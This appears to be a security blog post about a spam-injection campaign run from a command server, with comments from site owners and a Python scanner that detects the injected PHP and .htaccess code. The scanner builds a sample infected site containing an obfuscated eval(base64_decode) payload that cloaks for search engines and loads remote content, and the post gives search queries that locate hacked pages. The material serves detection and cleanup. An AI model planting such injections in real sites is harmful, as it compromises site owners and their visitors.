More spam: Google-traffic-analytics.com C&C server

We have been tracking another wave of spam injections affecting many popular web sites. What is interesting is that all of them are controlled from a single site: http://www.google-traffic-analytics.com.

And when this site went down, guess what is showing up on Google:


Yes, that is around 202k different pages on hacked sites that now return that error. While google-traffic-analytics.com was up, the same pages served spam (5mg tadalafil, viagra, etc.) to the search engines instead of the error.

Just some of the affected sites:

www.archaeological.org (Archaeological Institute of America)
www.energycenter.org (Center for Sustainable Energy)
www.ieta.org (International Emissions Trading Association)
www.efpa-italia.org (European Financial Planning Association)
www.memes.org
www.ancbs.org
www.grains.org
summits.aberdeen.com
www.scbar.org
www.stpsb.org
teamfocususa.org
www.npg.org.uk
www.brooklynwaldorf.org
www.pcs.org
www.nyew.org
www.vrwa.org
www.ior-institute.org
www.greenway.org
www.oldlife.org

Finding them on Google is pretty simple as well: search for inurl:.org "5mg tadalafil", or for "http://www.google-traffic-analytics.com" "Warning: file_get_contents". The second query matches the PHP warning a hacked site prints when it tries to fetch content from google-traffic-analytics.com and that server is offline.

As for cleaning up an affected site: the attackers added a base64-encoded eval to index.php that loads content from http://www.google-traffic-analytics.com and serves it as the page only when the request comes from a search engine (a normal visitor sees the site as usual, which is why the injection is easy to miss). Removing that injected code is enough to stop the spam and the error, but you still have to find and fix the root cause that allowed the site to be hacked, or it will simply be reinfected.
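As an added example (not part of the original post, and not Sucuri's own tooling), here is a Python scanner that checks a web root for the indicators named in this post and in the comments below: eval(base64_decode(...)) and $_SERVER[base64_decode(...)] in PHP files, base64 literals that decode to references to google-traffic-analytics.com, file_get_contents or a search-engine User-Agent check, and the RewriteRule one reader found inserted into .htaccess. The sample site it scans is constructed to mimic the described behaviour; the real payload is not reproduced on this page, so treat the patterns as a starting point rather than a signature.

```python
import base64
import os
import re
import tempfile

# Indicators taken from the post and the comments below: the C&C domain, the remote fetch,
# the search-engine check, the base64-obfuscated $_SERVER key and the one-line rewrite.
CNC_DOMAIN = "google-traffic-analytics.com"
PAYLOAD_MARKERS = (CNC_DOMAIN, "file_get_contents", "HTTP_USER_AGENT",
                   "googlebot", "msnbot", "slurp")
B64_LITERAL_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)", re.I)
EVAL_B64_RE = re.compile(r"eval\s*\(\s*base64_decode", re.I)
SERVER_B64_RE = re.compile(r"\$_SERVER\s*\[\s*base64_decode", re.I)
HTACCESS_RULE_RE = re.compile(r"^\s*RewriteRule\s+\^\(p=\.\*\)\$\s+index\.php\?\$1\s*$", re.M)


def decode_b64_literals(text):
    """Decode every base64_decode('...') literal in text; skip ones that are not valid base64."""
    decoded = []
    for match in B64_LITERAL_RE.finditer(text):
        raw = re.sub(r"\s", "", match.group(1))
        try:
            decoded.append(base64.b64decode(raw, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a subclass of ValueError
            continue
    return decoded


def scan_php(text):
    """Return human-readable findings for the contents of one PHP file."""
    findings = []
    if EVAL_B64_RE.search(text):
        findings.append("eval(base64_decode(...)) present")
    if SERVER_B64_RE.search(text):
        findings.append("$_SERVER key obfuscated with base64_decode")
    for payload in decode_b64_literals(text):
        hits = [m for m in PAYLOAD_MARKERS if m.lower() in payload.lower()]
        if hits:
            findings.append("decoded payload references: " + ", ".join(hits))
    if CNC_DOMAIN in text:
        findings.append("plaintext reference to " + CNC_DOMAIN)
    return findings


def scan_htaccess(text):
    """Flag the RewriteRule a commenter found inserted into .htaccess."""
    return ["injected RewriteRule routing ?p= to index.php"] if HTACCESS_RULE_RE.search(text) else []


def scan_tree(root):
    """Walk a web root; return {relative path: findings} for every file with a finding."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == ".htaccess":
                findings = scan_htaccess(text)
            elif name.lower().endswith(".php"):
                findings = scan_php(text)
            else:
                continue
            if findings:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return report


# Constructed sample modelled on the behaviour the post describes; this is not captured malware.
SAMPLE_PAYLOAD = (
    "if(stripos($_SERVER['HTTP_USER_AGENT'],'googlebot')!==false)"
    "{echo file_get_contents('http://www.google-traffic-analytics.com/?p='.$_GET['p']);}"
)


def build_sample_site(root):
    """Write a constructed web root: one clean page, two injected PHP files, one bad .htaccess."""
    payload_b64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    ua_key_b64 = base64.b64encode(b"HTTP_USER_AGENT").decode()
    files = {
        "index.php": "<?php\nif($_SERVER[base64_decode('%s')]) eval(base64_decode('%s'));\n"
                     "// legitimate site code follows\n" % (ua_key_b64, payload_b64),
        "about.php": "<?php echo 'clean page';\n",
        ".htaccess": "RewriteEngine On\nRewriteRule ^(p=.*)$ index.php?$1\n"
                     "RewriteRule ^(.*)$ index.php [L]\n",
        "img/c.php": "<?php eval(base64_decode('%s')); ?>" % payload_b64,
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)


def scan_sample_site():
    """Build the constructed sample in a temporary directory, scan it and return the report."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, findings in sorted(scan_sample_site().items()):
        print(path)
        for finding in findings:
            print("    " + finding)
```

Against a real site, call scan_tree('/path/to/webroot'). A hit tells you which file to open, not that the rest of the site is clean: whoever could write index.php could also drop other files (the commenter below found c.php, l.php and cart.php in the root and more in the img directory), so restore from a known-good copy, change the FTP and admin credentials, and look for the entry point.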

We will post more details when we have them.


Need help with a hacked site? Check out http://sucuri.net for a complete malware removal and site monitoring solution.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • marc

    Thanks for this post! I'm working on the brooklynwaldorf.org website and I just deleted several php files from the root directory (c.php, l.php, cart.php, etc.) and a load of files in our img directory. Wondering if there is anything else to do, but wait and see if our search results recover?

    I'm not sure that I understand the connection to google-traffic-analytics.com. Do you think there are any specific fixes to do here? So far, I've only deleted files and changed the FTP password...

  • Eobyte

    My website was being redirected to google-traffic-analytics.com. They had added a line to my index.php that started with "if($_SERVER[base64_decode" and continued on with a bunch of junk. It was on line 2. I restored the original file but probably could have just deleted that line. Additionally, in my root folder, the file .htaccess had one line added in the middle of the file. It read "RewriteRule ^(p=.*)$ index.php?$1". My site is back to normal but I don't yet know how to prevent it again. I hope this helps.
